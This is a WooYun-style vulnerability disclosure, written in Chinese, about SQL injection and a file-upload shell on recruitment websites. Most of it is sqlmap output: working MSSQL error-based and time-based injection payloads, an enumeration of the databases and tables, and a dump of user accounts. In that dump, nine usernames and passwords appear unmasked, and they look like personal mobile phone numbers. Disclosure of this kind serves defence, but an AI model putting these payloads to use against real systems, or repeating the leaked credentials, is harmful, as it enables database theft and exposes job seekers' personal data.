乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-30: 细节已通知厂商并且等待厂商处理中 2015-09-02: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-09-12: 细节向核心白帽子及相关领域专家公开 2015-09-22: 细节向普通白帽子公开 2015-10-02: 细节向实习白帽子公开 2015-10-17: 细节向公众公开
注入 - - 扫半天后台发现没有绝望中登陆一个账户发现任意上传2个旁站也是招聘
受影响网站
http://**.**.**.**/ 权2 pr4http://**.**.**.**/ 权1 pr4http://**.**.**.**/ 权2 pr4
加分站点一共15个注入点
http://**.**.**.**/web_joblist.aspx?CompID=20150531211633218http://**.**.**.**/web_company.aspx?CompID=20150531211633218http://**.**.**.**/login_jobpanduan.aspx?UserName=
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: CompID (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: CompID=20150531211633218') AND 4672=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4672=4672) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(98)+CHAR(113))) AND ('oQcS'='oQcS Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: CompID=20150531211633218') OR 5060=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ('whdK'='whdK---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.6, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008available databases [12]:[*] cptdb[*] cptdb_yj[*] dddb[*] dlwebdb[*] FinanceSystemDB[*] fyh_cptdb[*] fyh_xsdydb[*] hbdb[*] master[*] model[*] msdb[*] tempdbsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: CompID (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: CompID=20150531211633218') AND 4672=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4672=4672) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(98)+CHAR(113))) AND ('oQcS'='oQcS Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: CompID=20150531211633218') OR 5060=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ('whdK'='whdK---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.6, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008Database: dlwebdb[61 tables]+--------------------+| Table1 || bjxJobList || bjxJobList2 || dtproperties || gj_agreeaddno || gj_agreement || gj_areainfo || gj_bbscoluminfo || gj_bbsinfo || gj_bbsrecinfo || gj_bbstotallist || gj_bbsuserlist || gj_checkinfo || gj_checksetup || gj_compaddno || gj_companyinfo || gj_companyinfo_bak || gj_compjob || gj_compjob_bak || gj_complookjob || gj_compproperty || gj_educationinfo || gj_headhunter || gj_jobaddno || gj_jobeducation || gj_jobhistory || gj_jobinfo || gj_jobinfo_bak || gj_jobkeyinfo || gj_jobkeyinfo1 || gj_jobkeyinfo2 || gj_jobkeyinfo3 || gj_jobkeylist || gj_jobkeyword || gj_jobtxtlist || gj_mybook || gj_myjoblist || gj_nbwebinfo || gj_posaddno || gj_posinfo || gj_positioninfo || gj_remark || gj_report || gj_specialinfo || gj_userconnect || gj_userinfo || gj_userlist || gj_webcol || gj_webinfo || myTableInfo || myTableJobinfo || myTableList || myTableLook || myTablejobedu || myTablejobhistory || myepjoblist || pbcatcol || pbcatedt || pbcatfmt || pbcattbl || pbcatvld |+--------------------+Database: dlwebdb+------------------------+---------+| Table | Entries |+------------------------+---------+| dbo.gj_jobkeyword | 1421129 || dbo.gj_bbsinfo | 144719 || dbo.gj_compjob | 117943 || dbo.gj_remark | 94180 || dbo.gj_jobhistory | 90560 || dbo.gj_jobaddno | 66778 || dbo.gj_userlist | 63111 || dbo.gj_jobeducation | 58931 || dbo.gj_jobinfo | 56439 || dbo.gj_posaddno | 51275 || dbo.gj_positioninfo | 50539 || dbo.gj_jobkeyinfo | 49454 || dbo.gj_jobtxtlist | 30864 || dbo.myTableInfo | 26888 || dbo.gj_complookjob | 23236 || dbo.Table1 | 21656 || dbo.gj_report | 17062 || dbo.gj_webinfo | 13036 || dbo.myTableList | 12634 || dbo.gj_compaddno | 9122 || dbo.gj_agreement | 8057 || dbo.gj_companyinfo | 8009 || dbo.gj_agreeaddno | 7674 || dbo.gj_checkinfo | 4719 || dbo.myepjoblist | 4090 || dbo.myTablejobhistory | 2451 || dbo.gj_bbsuserlist | 2358 || dbo.myTablejobedu | 1870 || dbo.myTableJobinfo | 1845 || dbo.gj_mybook | 1702 || dbo.gj_bbstotallist | 1319 || dbo.gj_jobkeylist | 1117 || dbo.gj_bbsrecinfo | 1013 || dbo.bjxJobList2 | 999 || dbo.gj_companyinfo_bak | 990 || dbo.gj_areainfo | 824 || dbo.myTableLook | 531 || dbo.gj_compjob_bak | 356 || dbo.gj_specialinfo | 315 || dbo.gj_jobinfo_bak | 287 || dbo.gj_posinfo | 187 || dbo.gj_myjoblist | 183 || dbo.gj_compproperty | 97 || dbo.gj_bbscoluminfo | 31 || dbo.gj_nbwebinfo | 27 || dbo.gj_userinfo | 23 || dbo.gj_userconnect | 22 || dbo.gj_webcol | 12 || dbo.gj_educationinfo | 10 || dbo.gj_checksetup | 6 || dbo.gj_headhunter | 5 |+------------------------+---------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: CompID (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: CompID=20150531211633218') AND 4672=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4672=4672) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(98)+CHAR(113))) AND ('oQcS'='oQcS Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: CompID=20150531211633218') OR 5060=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ('whdK'='whdK---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.6, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008Database: dlwebdbTable: gj_userlist[9 entries]+-------------+-------------+| userpwd | username |+-------------+-------------+| 13608625254 | 13608625254 || 13728997902 | 13728997902 || 15919100269 | 15919100269 || 15920137975 | 15920137975 || 18066122226 | 18066122226 || 13450359492 | 13450359492 || 15086006369 | 15086006369 || 15821583254 | 15821583254 || 15979843184 | 15979843184 |+-------------+-------------+
扫半天后台发现没有绝望中登陆一个账户发现任意上传getshell
数据库可以下载 可以跨磁盘 2个旁站也是招聘 就不下载数据库截图了 危害极大
建议重视好几十万的简历
危害等级:中
漏洞Rank:10
确认时间:2015-09-02 08:13
CNVD确认并复现所述情况,已经转由CNCERT向能源行业信息化主管部门通报,由其后续尝试协调网站管理单位处置.
暂无